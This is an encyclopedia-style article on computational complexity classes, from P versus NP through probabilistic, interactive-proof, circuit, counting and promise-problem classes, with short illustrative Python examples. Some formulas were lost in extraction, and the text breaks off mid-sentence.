While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable, P and NP are actually at the center of one of the most famous unsolved problems in computer science: the P versus NP problem. While it is known that P ⊆ NP (intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition, P is the class of problems whose polynomial-time verifiers need only receive the empty string as their certificate), it is not known whether NP is strictly larger than P. If P = NP, then it follows that nondeterminism provides no additional computational power over determinism with regards to the ability to quickly find a solution to a problem; that is, being able to explore all possible branches of computation provides at most a polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can be quickly checked for correctness (that is, if the problem is in NP), then there also exists an algorithm that can quickly construct that proof (that is, the problem is in P).[6] However, the overwhelming majority of computer scientists believe that P ≠ NP,[7] and most cryptographic schemes employed today rely on the assumption that P ≠ NP.[8]

EXPTIME (sometimes shortened to EXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time and NEXPTIME (sometimes shortened to NEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIME = ⋃_{k∈N} DTIME(2^(n^k)) and NEXPTIME = ⋃_{k∈N} NTIME(2^(n^k)). EXPTIME is a strict superset of P and NEXPTIME is a strict superset of NP. It is further the case that EXPTIME ⊆ NEXPTIME.
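Returning to the certificate characterization of NP, a verifier is easy to sketch for a concrete problem. The Python function below is a hypothetical polynomial-time verifier for SUBSET-SUM (given a list of numbers and a target, is there a subset summing to the target?), where the certificate is a list of indices into the list; the encoding and the function name are illustrative assumptions, not a standard API.

def verify_subset_sum(instance, certificate):
    """Polynomial-time verifier: instance = (numbers, target), certificate = index list."""
    numbers, target = instance
    if len(set(certificate)) != len(certificate):                 # indices must be distinct
        return False
    if any(i < 0 or i >= len(numbers) for i in certificate):      # indices must be in range
        return False
    return sum(numbers[i] for i in certificate) == target         # one pass, clearly polynomial

print(verify_subset_sum(([3, 34, 4, 12, 5, 2], 9), [2, 4]))   # True:  4 + 5 = 9
print(verify_subset_sum(([3, 34, 4, 12, 5, 2], 9), [0, 1]))   # False: 3 + 34 = 37

Checking a proposed subset is fast; what is not known is whether a matching subset can always be found quickly, which is exactly the P versus NP question in miniature.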
It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. 
Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. 
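As a concrete instance of the polynomial-time reductions just described, the following Python sketch implements the classic Karp-style reduction from INDEPENDENT-SET to CLIQUE: a graph G has an independent set of size k exactly when the complement of G has a clique of size k. The graph encoding (a vertex list plus an edge list) and the function names are illustrative choices.

from itertools import combinations

def complement_edges(vertices, edges):
    """Edge set of the complement graph."""
    present = {frozenset(e) for e in edges}
    return [tuple(p) for p in combinations(vertices, 2) if frozenset(p) not in present]

def reduce_independent_set_to_clique(vertices, edges, k):
    """Map an INDEPENDENT-SET instance (G, k) to a CLIQUE instance (complement of G, k).
    The map is computable in polynomial time and preserves yes/no answers, so
    INDEPENDENT-SET is polynomial-time reducible to CLIQUE."""
    return vertices, complement_edges(vertices, edges), k

V = [1, 2, 3, 4]
E = [(1, 2), (2, 3), (3, 4)]           # a path; {1, 3} and {2, 4} are independent sets
print(reduce_independent_set_to_clique(V, E, 2))
# ([1, 2, 3, 4], [(1, 3), (1, 4), (2, 4)], 2) -- and indeed {1, 3} is a 2-clique there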
Reductions motivate the concept of a problem being hard for a complexity class. A problem X is hard for a class of problems C if every problem in C can be polynomial-time reduced to X. Thus no problem in C is harder than X, since an algorithm for X allows us to solve any problem in C with at most polynomial slowdown. Of particular importance, the set of problems that are hard for NP is called the set of NP-hard problems.

If a problem X is hard for C and is also in C, then X is said to be complete for C. This means that X is the hardest problem in C (since there could be many problems that are equally hard, more precisely X is as hard as the hardest problems in C). Of particular importance is the class of NP-complete problems—the most difficult problems in NP. Because all problems in NP can be polynomial-time reduced to NP-complete problems, finding an NP-complete problem that can be solved in polynomial time would mean that P = NP.

Savitch's theorem establishes the relationship between deterministic and nondeterministic space resources. It shows that if a nondeterministic Turing machine can solve a problem using f(n) space, then a deterministic Turing machine can solve the same problem in f(n)² space, i.e. in the square of the space. Formally, Savitch's theorem states that for any f(n) > n,[14] NSPACE(f(n)) ⊆ DSPACE(f(n)²).

Important corollaries of Savitch's theorem are that PSPACE = NPSPACE (since the square of a polynomial is still a polynomial) and EXPSPACE = NEXPSPACE (since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space.

By definition of DTIME, it follows that DTIME(n^k1) is contained in DTIME(n^k2) if k1 ≤ k2, since O(n^k1) ⊆ O(n^k2) if k1 ≤ k2. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much additional time or space is needed in order to increase the number of problems that can be solved.

The time hierarchy theorem states that a deterministic Turing machine given modestly more time can solve strictly more problems: for a time-constructible bound f(n), DTIME(f(n)) is strictly contained in DTIME(f(n) · log²(f(n))). The space hierarchy theorem states the analogous result for space, with an even tighter gap: for a space-constructible bound f(n), DSPACE(o(f(n))) is strictly contained in DSPACE(f(n)). The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes that P is strictly contained in EXPTIME, and the space hierarchy theorem establishes that L is strictly contained in PSPACE.

While deterministic and non-deterministic Turing machines are the most commonly used models of computation, many complexity classes are defined in terms of other computational models.
In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. 
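The flavour of one-sided error that defines RP and co-RP can be seen in a standard textbook example, Freivalds' algorithm for checking a matrix product: if AB = C the test always accepts, and if AB ≠ C each round rejects with probability at least 1/2, so k independent rounds drive the error below 1/2^k. The Python sketch below is an example of this general style of randomized algorithm, not something drawn from this article, and the matrices used are illustrative.

import random

def freivalds(A, B, C, rounds=20):
    """Randomized check of whether A @ B == C using matrix-vector products only."""
    n = len(A)
    for _ in range(rounds):
        r = [random.randint(0, 1) for _ in range(n)]                      # random 0/1 vector
        Br = [sum(B[i][j] * r[j] for j in range(n)) for i in range(n)]
        ABr = [sum(A[i][j] * Br[j] for j in range(n)) for i in range(n)]
        Cr = [sum(C[i][j] * r[j] for j in range(n)) for i in range(n)]
        if ABr != Cr:
            return False      # a witness was found: certainly AB != C
    return True               # no witness in any round: probably AB = C

A = [[1, 2], [3, 4]]
B = [[5, 6], [7, 8]]
C = [[19, 22], [43, 50]]      # the true product of A and B
print(freivalds(A, B, C))     # True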
The broadest class of efficiently-solvable probabilistic problems isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proofs definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomially-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, in the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) is a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to need more than a single round of messaging between the prover and the verifier. 
Interactive proof systems that provide greater computational power over standard complexity classes thus requireprobabilisticverifiers, which means that the verifier's questions to the prover are computed usingprobabilistic algorithms. As noted in the section above onrandomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probabilityϵ{\displaystyle \epsilon }. The most general complexity class arising out of this characterization is the classIP(interactive polynomial time), which is the class of all problems solvable by an interactive proof system(P,V){\displaystyle (P,V)}, whereV{\displaystyle V}is probabilistic polynomial-time and the proof system satisfies two properties: for a languageL∈IP{\displaystyle L\in {\mathsf {IP}}} An important feature ofIPis that it equalsPSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by adeterministic Turing machinewith polynomial space resources, and vice versa. A modification of the protocol forIPproduces another important complexity class:AM(Arthur–Merlin protocol). In the definition of interactive proof systems used byIP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation—it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are calledprivate random coins. The interactive proof system can be constrained so that the coins used by the verifier arepublic random coins; that is, the prover is able to see the coins. Formally,AMis defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover.AMcan be generalized toAM[k], wherekis the number of messages exchanged (so in the generalized form the standardAMdefined above isAM[2]). However, it is the case that for allk≥2{\displaystyle k\geq 2},AM[k]=AM[2]. It is also the case thatAM[k]⊆IP[k]{\displaystyle {\mathsf {AM}}[k]\subseteq {\mathsf {IP}}[k]}. Other complexity classes defined using interactive proof systems includeMIP(multiprover interactive polynomial time) andQIP(quantum interactive polynomial time). An alternative model of computation to theTuring machineis theBoolean circuit, a simplified model of thedigital circuitsused in moderncomputers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model fornon-uniform computation(computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuitC{\displaystyle C}is adirected acyclic graphin which edges represent wires (which carry thebitvalues 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices representlogic gates(generally theAND,OR, andNOT gates). One logic gate is designated the output gate, and represents the end of the computation. 
The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). 
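The circuit model underlying these classes is straightforward to make concrete. The following Python sketch evaluates a Boolean circuit given as a directed acyclic graph; the dictionary encoding (gate name mapped to gate type and predecessor list) and the XOR example circuit are illustrative choices, not a standard representation.

def eval_circuit(circuit, output_gate, inputs):
    """circuit: gate -> (op, predecessors), where op is 'IN', 'NOT', 'AND', or 'OR'."""
    memo = {}
    def value(g):
        if g not in memo:
            op, preds = circuit[g]
            if op == "IN":
                memo[g] = inputs[g]                             # source vertex: an input bit
            elif op == "NOT":
                memo[g] = 1 - value(preds[0])
            elif op == "AND":
                memo[g] = int(all(value(p) for p in preds))
            else:  # "OR"
                memo[g] = int(any(value(p) for p in preds))
        return memo[g]
    return value(output_gate)

# A circuit computing XOR(x1, x2) = (x1 OR x2) AND NOT(x1 AND x2); it has 6 vertices.
xor = {
    "x1": ("IN", []), "x2": ("IN", []),
    "or": ("OR", ["x1", "x2"]),
    "and": ("AND", ["x1", "x2"]),
    "nand": ("NOT", ["and"]),
    "out": ("AND", ["or", "nand"]),
}
print([eval_circuit(xor, "out", {"x1": a, "x2": b})
       for a, b in [(0, 0), (0, 1), (1, 0), (1, 1)]])   # [0, 1, 1, 0]

This single circuit only handles inputs of length 2; deciding a language in the sense above would require one such circuit for every input length, which is exactly the circuit-family notion.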
P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. 
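On a very small graph the contrast between CYCLE and #CYCLE can be checked directly by brute force, as in the following Python sketch. The adjacency-dictionary encoding and the example graph are illustrative, and an enumeration like this takes exponential time in general; it is meant only to show that the counting problem refines the decision problem.

def count_simple_cycles(adj):
    """Count the simple cycles of length >= 3 in an undirected graph, each counted once."""
    cycles = set()
    def extend(path, visited):
        for nxt in adj[path[-1]]:
            if nxt == path[0] and len(path) >= 3:
                edges = frozenset(frozenset((path[i], path[(i + 1) % len(path)]))
                                  for i in range(len(path)))
                cycles.add(edges)                    # canonical form: the cycle's edge set
            elif nxt not in visited:
                extend(path + [nxt], visited | {nxt})
    for v in adj:
        extend([v], {v})
    return len(cycles)

triangle_plus_edge = {1: {2, 3}, 2: {1, 3}, 3: {1, 2, 4}, 4: {3}}
print(count_simple_cycles(triangle_plus_edge) > 0)   # CYCLE:  True (a yes/no answer)
print(count_simple_cycles(triangle_plus_edge))       # #CYCLE: 1    (a number)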
Counting problems arise in a number of fields, includingstatistical estimation,statistical physics,network design, andeconomics.[21] #P(pronounced "sharp P") is an important class of counting problems that can be thought of as the counting version ofNP.[22]The connection toNParises from the fact that the number of solutions to a problem equals the number of accepting branches in anondeterministic Turing machine's computation tree.#Pis thus formally defined as follows: And just asNPcan be defined both in terms of nondeterminism and in terms of a verifier (i.e. as aninteractive proof system), so too can#Pbe equivalently defined in terms of a verifier. Recall that a decision problem is inNPif there exists a polynomial-time checkablecertificateto a given problem instance—that is,NPasks whether there exists a proof of membership (a certificate) for the input that can be checked for correctness in polynomial time. The class#Paskshow manysuch certificates exist.[22]In this context,#Pis defined as follows: Counting problems are a subset of a broader class of problems calledfunction problems. A function problem is a type of problem in which the values of afunctionf:A→B{\displaystyle f:A\to B}are computed. Formally, a function problemf{\displaystyle f}is defined as a relationR{\displaystyle R}over strings of an arbitraryalphabetΣ{\displaystyle \Sigma }: An algorithm solvesf{\displaystyle f}if for every inputx{\displaystyle x}such that there exists ay{\displaystyle y}satisfying(x,y)∈R{\displaystyle (x,y)\in R}, the algorithm produces one suchy{\displaystyle y}. This is just another way of saying thatf{\displaystyle f}is afunctionand the algorithm solvesf(x){\displaystyle f(x)}for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}}. An important function complexity class isFP, the class of efficiently solvable functions.[23]More specifically,FPis the set of function problems that can be solved by adeterministic Turing machineinpolynomial time.[23]FPcan be thought of as the function problem equivalent ofP. Importantly,FPprovides some insight into both counting problems andPversusNP. If#P=FP, then the functions that determine the number of certificates for problems inNPare efficiently solvable. And since computing the number of certificates is at least as hard as determining whether a certificate exists, it must follow that if#P=FPthenP=NP(it is not known whether this holds in the reverse, i.e. whetherP=NPimplies#P=FP).[23] Just asFPis the function problem equivalent ofP,FNPis the function problem equivalent ofNP. Importantly,FP=FNPif and only ifP=NP.[24] Promise problemsare a generalization of decision problems in which the input to a problem is guaranteed ("promised") to be from a particular subset of all possible inputs. Recall that with a decision problemL⊆{0,1}∗{\displaystyle L\subseteq \{0,1\}^{*}}, an algorithmM{\displaystyle M}forL{\displaystyle L}must act (correctly) oneveryw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}}. A promise problem loosens the input requirement onM{\displaystyle M}by restricting the input to some subset of{0,1}∗{\displaystyle \{0,1\}^{*}}. Specifically, a promise problem is defined as a pair of non-intersecting sets(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}, where:[25] The input to an algorithmM{\displaystyle M}for a promise problem(ΠACCEPT,ΠREJECT){\displaystyle (\Pi _{\text{ACCEPT}},\Pi _{\text{REJECT}})}is thusΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}, which is called thepromise. 
Strings inΠACCEPT∪ΠREJECT{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}}are said tosatisfy the promise.[25]By definition,ΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}andΠREJECT{\displaystyle \Pi _{\text{REJECT}}}must be disjoint, i.e.ΠACCEPT∩ΠREJECT=∅{\displaystyle \Pi _{\text{ACCEPT}}\cap \Pi _{\text{REJECT}}=\emptyset }. Within this formulation, it can be seen that decision problems are just the subset of promise problems with the trivial promiseΠACCEPT∪ΠREJECT={0,1}∗{\displaystyle \Pi _{\text{ACCEPT}}\cup \Pi _{\text{REJECT}}=\{0,1\}^{*}}. With decision problems it is thus simpler to simply define the problem as onlyΠACCEPT{\displaystyle \Pi _{\text{ACCEPT}}}(withΠREJECT{\displaystyle \Pi _{\text{REJECT}}}implicitly being{0,1}∗/ΠACCEPT{\displaystyle \{0,1\}^{*}/\Pi _{\text{ACCEPT}}}), which throughout this page is denotedL{\displaystyle L}to emphasize thatΠACCEPT=L{\displaystyle \Pi _{\text{ACCEPT}}=L}is aformal language. Promise problems make for a more natural formulation of many computational problems. For instance, a computational problem could be something like "given aplanar graph, determine whether or not..."[26]This is often stated as a decision problem, where it is assumed that there is some translation schema that takeseverystrings∈{0,1}∗{\displaystyle s\in \{0,1\}^{*}}to a planar 